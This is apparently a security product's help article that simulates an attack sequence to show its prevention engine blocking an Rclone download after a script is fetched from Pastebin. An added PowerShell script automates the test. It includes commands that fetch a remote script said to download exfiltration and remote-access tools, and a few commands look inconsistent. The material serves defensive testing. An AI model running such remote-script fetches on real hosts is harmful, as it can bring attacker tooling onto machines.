Dynamic Prevention is a behavior-based security engine that proactively applies dynamic controls in response to detected threats to reduce the attack surface and mitigate threats early, before any impact occurs. For more information, see What is Dynamic Prevention?
This article walks through a simulated, real-world attack sequence to demonstrate how Dynamic Prevention protects your network. In this example, a user downloads a script from Pastebin; the attacker then attempts to retrieve additional high-risk tools needed for the next stage of the attack. Dynamic Prevention recognizes the malicious sequence and blocks the tool from being downloaded, stopping the attack before it can progress or cause any impact.
The response to this attack is fully automated. No additional rules are required. Simply enabling Dynamic Prevention is sufficient to prevent the attack.
To simulate this attack:
- Download a high-risk tool without being blocked
- Download the script from Pastebin
- Attempt to download the high-risk tools again. This time, the download is blocked.
To demonstrate that Dynamic Prevention blocks actions only when they are part of a malicious sequence, first download Rclone, an open-source command-line tool for managing files. Attackers commonly use Rclone as a post-compromise exfiltration tool because it is legitimate, powerful, and blends in with normal administrative activity. Downloading it before any suspicious activity has occurred shows that the tool on its own is not blocked.
Download Rclone in one of the following ways:
- Open the following URL in a browser:
  https://downloads.rclone.org/rclone-current-windows-amd64.zip
- On Windows devices, run the following PowerShell command:
  Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- On macOS/Linux devices, run the following Terminal command (the -o option saves the archive to a file instead of writing the binary content to the terminal):
  curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -o rclone-current-windows-amd64.zip
The download completes normally: no control has been applied to the host yet, so nothing is blocked.
To simulate the start of an attack, download a script from Pastebin that, when run, downloads common attacker tools such as Rclone (for exfiltration) and AnyDesk (for remote access).
Download the script from Pastebin:
- On Windows devices, run the following PowerShell command:
  (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
- On macOS/Linux devices, run the following Terminal command:
  curl -sSL "https://pastebin.com/raw/tXhVK2V7"
The script runs and downloads the tools. Retrieving a script from Pastebin is the suspicious behavior that Dynamic Prevention acts on: a dynamic control is applied to the host, which is shown in the Threats Dashboard in the Host with Controls widget. For more information, see Using the Security Threats Dashboard.
In the simulated attack, the attacker attempts to download Rclone. However, because this action follows the suspicious activity of downloading the script from Pastebin and a control is applied, Dynamic Prevention blocks the Rclone download.
Download Rclone again in one of the following ways:
- Open the following URL in a browser:
  https://downloads.rclone.org/rclone-current-windows-amd64.zip
- On Windows devices, run the following PowerShell command:
  Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- On macOS/Linux devices, run the following Terminal command:
  curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -o rclone-current-windows-amd64.zip
This time the control blocks the download of the file. The mitigated threat is shown in the Threats Dashboard in the Host with Mitigated Threats widget.
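The three steps above can be run as one script on a Windows test host so that the result (allowed, then blocked) is checked automatically rather than by eye. The following is an added example and is not code from the original article or from the vendor; it uses the Rclone and Pastebin URLs given above, fetches the Pastebin script without executing it (mirroring the DownloadString command), and assumes that a blocked download surfaces as an error from Invoke-WebRequest (connection reset or HTTP error). The function name Test-Download and the 5-second wait before the retry are choices made for this example, not behavior documented by the article.

```powershell
# Added example (not part of the original article): automate the three-step
# Dynamic Prevention simulation and verify the expected allowed/blocked pattern.
# Assumptions: a blocked download raises an exception from Invoke-WebRequest;
# anything that completes and writes a file is treated as allowed.
$RcloneUrl   = "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
$PastebinUrl = "https://pastebin.com/raw/C5VxKUpE"

# Hypothetical helper: attempt a download and report whether it succeeded.
function Test-Download {
    param([string]$Url, [string]$OutFile)
    try {
        Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing -TimeoutSec 30 -ErrorAction Stop
        $size = (Get-Item $OutFile).Length
        return [pscustomobject]@{ Url = $Url; Allowed = $true;  Detail = "$size bytes written" }
    } catch {
        return [pscustomobject]@{ Url = $Url; Allowed = $false; Detail = $_.Exception.Message }
    }
}

$work = Join-Path $env:TEMP "dp-sim"
New-Item -ItemType Directory -Force -Path $work | Out-Null

# Step 1: baseline. The tool alone must not be blocked.
$baseline = Test-Download -Url $RcloneUrl -OutFile (Join-Path $work "rclone-before.zip")

# Step 2: the trigger. Fetch (do not execute) the script from Pastebin.
$trigger = Test-Download -Url $PastebinUrl -OutFile (Join-Path $work "script.txt")

# Step 3: the same download again, now expected to be blocked by the control.
# Give the engine a moment to apply the control before retrying (assumed delay).
Start-Sleep -Seconds 5
$after = Test-Download -Url $RcloneUrl -OutFile (Join-Path $work "rclone-after.zip")

# Summarize all three attempts.
@(
    [pscustomobject]@{ Step = "1 Rclone (before)";  Allowed = $baseline.Allowed; Detail = $baseline.Detail }
    [pscustomobject]@{ Step = "2 Pastebin script";  Allowed = $trigger.Allowed;  Detail = $trigger.Detail }
    [pscustomobject]@{ Step = "3 Rclone (after)";   Allowed = $after.Allowed;    Detail = $after.Detail }
) | Format-Table -AutoSize

# Exit 0 only if the sequence matches the article: allowed first, blocked after the trigger.
if ($baseline.Allowed -and -not $after.Allowed) {
    Write-Host "Dynamic Prevention behaved as expected: baseline allowed, post-trigger download blocked."
    exit 0
} else {
    Write-Warning "Unexpected result; check the Threats Dashboard (Host with Controls / Host with Mitigated Threats)."
    exit 1
}
```

Save the script as a .ps1 file and run it from a PowerShell prompt rather than pasting it interactively, because the final exit statements would otherwise close the session. Step 2 is deliberately not asserted on: the article states that the control is applied after the script is fetched, so that request is expected to succeed, and only the before/after contrast on the Rclone download demonstrates the behavior-based decision.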